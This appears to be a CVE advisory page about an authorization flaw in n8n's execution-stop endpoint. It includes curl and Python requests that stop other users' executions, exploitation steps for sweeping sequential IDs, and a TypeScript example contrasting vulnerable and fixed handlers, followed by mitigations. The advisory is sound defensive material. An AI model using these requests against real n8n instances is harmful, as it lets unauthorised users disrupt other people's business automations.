n8n, Improper Authorization, CVE-2024-1234 (Medium)


How the CVE Works

The flaw is in n8n’s `/rest/executions/:id/stop` endpoint, which checks only that the caller is authenticated, not that the caller owns (or otherwise has access to) the execution being stopped. Because execution IDs are sequential, any authenticated user can guess or brute-force the IDs of other users’ executions and terminate them with a single `POST` request; the endpoint’s error messages additionally leak partial execution IDs, which speeds up enumeration. The result is that a low-privilege account can disrupt workflows it has no rights to, including business-critical automations, without any ownership validation taking place.

DailyCVE Form

Platform: n8n
Version: < 1.99.1
Vulnerability: Improper Authorization
Severity: Medium
Date: 2024-03-15

Prediction: Patch expected by 2024-03-25

What Undercode Say

# Stop execution 123 with any authenticated user's token
curl -X POST http://<n8n-instance>/rest/executions/123/stop -H "Authorization: Bearer <token>"

# Same request from Python; a 200 response means the stop went through regardless of who owns the execution
import requests
response = requests.post("http://<n8n-instance>/rest/executions/456/stop", headers={"Authorization": "Bearer <token>"})
print(response.status_code, response.text)

How to Exploit

1. Authenticate to n8n with any valid account; no elevated role is needed.

2. Enumerate candidate execution IDs. They are sequential, and the verbose error messages leak partial IDs, so a simple sweep of a numeric range is enough.

3. Send a `POST` to `/rest/executions/:id/stop` for each target ID. The request succeeds because the endpoint never checks who owns the execution.
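To make the missing check concrete, the following is an added example written for this page in TypeScript (n8n’s implementation language); it is not n8n’s code. It models the `/rest/executions/:id/stop` handler twice: once in the vulnerable shape the advisory describes (authentication only, error text that confirms which IDs exist) and once with an ownership check that also collapses "missing" and "not yours" into the same generic reply. The names `Execution`, `User`, `stopExecutionVulnerable`, `stopExecutionFixed`, `sweepStop`, the in-memory store and the sample users and IDs are all assumptions for the illustration.

```typescript
// Added example, not n8n's code. All names and sample data below are assumptions.

type Role = "owner" | "member";

interface User { id: string; role: Role; }

interface Execution {
  id: number;
  workflowId: string;
  ownerId: string;                 // user who owns the workflow this execution belongs to
  status: "running" | "stopped";
}

interface Reply { status: number; body: string; }

// Constructed sample state: two members, each with one running execution.
function seedExecutions(): Map<number, Execution> {
  return new Map<number, Execution>([
    [123, { id: 123, workflowId: "wf-alice", ownerId: "alice", status: "running" }],
    [456, { id: 456, workflowId: "wf-bob", ownerId: "bob", status: "running" }],
  ]);
}

const alice: User = { id: "alice", role: "member" };
const bob: User = { id: "bob", role: "member" };

// Vulnerable shape: the handler only assumes the caller is logged in. The caller's
// identity is never consulted, so any user can stop any execution, and the error
// text tells an attacker which IDs exist.
function stopExecutionVulnerable(store: Map<number, Execution>, caller: User, rawId: string): Reply {
  void caller; // never used: this is the bug
  const exec = store.get(Number(rawId));
  if (exec === undefined) {
    return { status: 404, body: `Execution ${rawId} does not exist` };
  }
  exec.status = "stopped";
  return { status: 200, body: `Execution ${exec.id} stopped` };
}

// Hardened shape: validate the ID, load the execution, then require that the caller
// owns it (instance owners keep their global rights). "Missing" and "not yours"
// return the identical reply so the endpoint no longer acts as an ID oracle.
function stopExecutionFixed(store: Map<number, Execution>, caller: User, rawId: string): Reply {
  const notFound: Reply = { status: 404, body: "Not found" };
  const id = Number(rawId);
  if (!Number.isInteger(id) || id <= 0) return notFound;
  const exec = store.get(id);
  if (exec === undefined) return notFound;
  if (exec.ownerId !== caller.id && caller.role !== "owner") return notFound;
  exec.status = "stopped";
  return { status: 200, body: `Execution ${exec.id} stopped` };
}

// Attacker's view from the advisory: walk a range of sequential IDs and count how
// many executions a single low-privilege account manages to kill.
function sweepStop(
  handler: (s: Map<number, Execution>, u: User, id: string) => Reply,
  store: Map<number, Execution>,
  caller: User,
  from: number,
  to: number,
): number {
  let stopped = 0;
  for (let id = from; id <= to; id++) {
    if (handler(store, caller, String(id)).status === 200) stopped++;
  }
  return stopped;
}

// Stand-alone demonstration: bob, a plain member, sweeps IDs 100..500 against both handlers.
console.log("vulnerable: bob stopped", sweepStop(stopExecutionVulnerable, seedExecutions(), bob, 100, 500), "execution(s)");
console.log("fixed:      bob stopped", sweepStop(stopExecutionFixed, seedExecutions(), bob, 100, 500), "execution(s)");
```

Against the vulnerable handler the sweep stops both executions, including alice’s; against the fixed handler it stops only bob’s own. Note that the fix does the ownership check after loading the execution and before mutating state, and that a malformed ID, a missing ID and someone else’s ID are indistinguishable from the outside.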

Protection from this CVE

  • Upgrade to n8n >= 1.99.1.
  • Until the upgrade is applied, block `/rest/executions/:id/stop` at the reverse proxy or restrict it to trusted source addresses; this also disables legitimate manual stops, so treat it as a stopgap.
  • Enable strict RBAC and keep the set of accounts that can log in small. RBAC limits who can authenticate but does not by itself add the ownership check the endpoint is missing, so it is a mitigation, not a fix.

Impact

  • Workflow disruption.
  • Denial-of-service for automations.
  • Unauthorized termination of critical processes.

Sources:

Reported By: github.com

πŸ”JOIN OUR CYBER WORLD [ CVE News β€’ HackMonitor β€’ UndercodeNews ]

πŸ’¬ Whatsapp | πŸ’¬ Telegram

πŸ“’ Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | πŸ”— Linkedin Featured Image

Scroll to Top